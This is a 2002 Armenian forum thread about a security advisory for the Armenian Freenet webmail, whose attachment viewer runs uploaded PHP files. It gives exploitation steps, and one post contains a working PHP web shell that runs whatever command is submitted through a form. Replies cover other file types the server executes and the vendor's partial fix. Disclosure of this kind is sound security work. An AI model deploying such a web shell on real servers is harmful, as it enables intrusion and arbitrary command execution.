Armenian Knowledge Base  

Go Back   Armenian Knowledge Base > Technical sections > Software > Software Security
Reload this Page

Armenian Freenet web based mailer security flaw

Register
Register DownloadsGalleryBlogs FAQ Social Groups Arcade Mark Forums Read

Reply
 
LinkBack Thread Tools
Old 09.07.2002, 05:49   #1
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post Armenian Freenet web based mailer security flaw
Armenian Freenet web based mailer security flaw
(software design bug)

VX Advisory #0002

0Originally Discovered by Vahram Igityan <[email protected]> @ 20020708

0DESCRIPTION
Armenian Freenet is the most popular free mail and hosting server in Armenia.
And it's web based mailer is part ot their free service located at http://email.freenet.am.

0OVERVIEW
Users on Armenian Freenet can execute any type of PHP code.

0DETAILS
When user is viewing his/her attachment its' beeing saved on server's disk in uniquie
directory and beeing getted by browser, so if you attach .php file, it will be parsed
by server.

0EXPLOIT
Write code like <? phpinfo();?> ,attach it and send to freenet account, the open youre
inbox using their web based mailer and -=enjoy=-

0SOLUTION
Rewrite the part of attachemt viewing code, use directory outside the DocumentRoot and show
attch by opening and dumping a file.
---eof--
__________________
Праздник к нам приходит...

|^^^^^^^^^'''^\| ||\__
| ВОДКА-ВОДКА | ||','''|'''''''\_____,_
| _..... _ | ||_ _|'__|_____||.........| |
'(@)'(@)'(@)''''''''''''''''''''''*|(@)""""|(@)*
Reply With Quote
Old 09.07.2002, 06:42   #2
Студент
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post
lol

Mne prosto interesno, est' li takoj tip attachmenta, kotoryj imeet smysl takim obrazom pokazyvat' (dage html ya by tak ne pokazyval)..

Nice discovery!
Reply With Quote
Old 09.07.2002, 14:23   #3
Школьник
 
Join Date: 04 2002
Location: Vanadzor
Posts: 227
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post
LoL
Reply With Quote
Old 09.07.2002, 15:47   #4
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post
And here is a proof exploit code ))
Code:
<?
function fo(){
?>
<BODY>
<FORM>
<INPUT TYPE=TEXT NAME=cmd VALUE=&quot;ls&quot;>
<INPUT TYPE=SUBMIT NAME=&quot;ss&quot; VALUE=&quot;bb&quot;>
</FORM>
</BODY>
<?
}

if (!isset($ss)){
	fo();
}else
{	
echo &quot;<PRE>\n&quot;;
	$pi = popen(&quot;$cmd&quot;,&quot;r&quot;);
		while ( ! feof($pi))
			print fgets($pi,512);
	pclose($pi);
echo &quot;</PRE>\n&quot;;
}
?>
Reply With Quote
Old 09.07.2002, 16:15   #5
Студент
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Thumbs up
Nothing else to say!
Nice job! And a really funny one! I bet fn-ovskij admin etot forum ne chitaet, tak chto eto delo esche dolgo budet available..
Reply With Quote
Old 09.07.2002, 17:13   #6
Школьник
 
Join Date: 04 2002
Location: Vanadzor
Posts: 227
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post
2 VX
misht vor senc luj ben es gtnu, [email protected] sysadmin asa, te che es drutyamb 1000avor userner kan fn-um.
mekn el [email protected] korcni u ....

vobshem ti mokodec!!! bayc anpayman skzbic adminin asa, ete iharke der ches asel
Reply With Quote
Old 09.07.2002, 17:31   #7
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post
Quote:
Originally posted by strax.:
2 VX
misht vor senc luj ben es gtnu, [email protected] sysadmin asa, te che es drutyamb 1000avor userner kan fn-um.
mekn el [email protected] korcni u ....

vobshem ti mokodec!!! bayc anpayman skzbic adminin asa, ete iharke der ches asel
Vendor was already notofyed...
But no ansewer getted
Reply With Quote
Old 09.07.2002, 19:38   #8
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post
Admin replyed...
He's very nice person
Reply With Quote
Old 10.07.2002, 10:53   #9
Студент
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post
Hmm.. Ne znayu kak eto vyrazit' v slovax no eto chto-to..
ANY file, kotoryj on znaet kak zapuskat', mailer zapuskaet v sebe, eto vklyuchaet php, cgi (tut malen'kie problemy s privilege-ami, no eto erunda), asp i tak dalee..
Eto prosto koshmar!

Plus file-y bez rasshireniya po neizvestnym prichinam pereimenovyvaet v file.txt i voobsche rabotaet prosto potryasno

2 VX:
Nadeyus' Tigran eto vse ponyal.. Emu nado voobsche prikryt' web-email poka on ego ne ispravit, esli emu freenet dorog ili ge ego rabota.
__________________
http://www.d-brane.com
Reply With Quote
Old 10.07.2002, 11:25   #10
Студент
 
Join Date: 06 2002
Location: Yerevan
Posts: 258
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Cool
2 VX
Eto Tigran tipa "zakryl" php, ostaviv vse ostal'noe??
Interesnyj chelovek

By the way naschet asp ya kagetsya nedosmotrel normal'no, ne ponimaet vrode by, no .c file-y ne pokazyvaet, opyat' taki vidno pytaetsya zapustit' u sebya i ne poluchaet privilegij ( similar to cgi )
Reply With Quote
Old 10.07.2002, 16:25   #11
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post
DA, on imenno zakryil
Xot' teper' "naglo" vzlomat' ne smogut
Reply With Quote
Old 10.07.2002, 16:57   #12
Школьник
 
Join Date: 05 2002
Location: Yerevan
Posts: 202
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post
VX, чего не отвечаешь на пЫсма?
Свяжись со мной как-нить...
Reply With Quote
Old 13.07.2002, 23:11   #13
Moderator
 
Mono's Avatar
 
Join Date: 10 2001
Location: Yerevan
Posts: 5,466
Blog Entries: 1
Downloads: 1
Uploads: 0
Reputation: 110 | 5
Thumbs up
Dzec !!
Reply With Quote
Sponsored Links
Reply

« Elsomsoft | What's the hell is this? »
Thread Tools


На правах рекламы:
реклама

All times are GMT. The time now is 18:07.

Contact Us - Archive - Top

Powered by vBulletin® Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.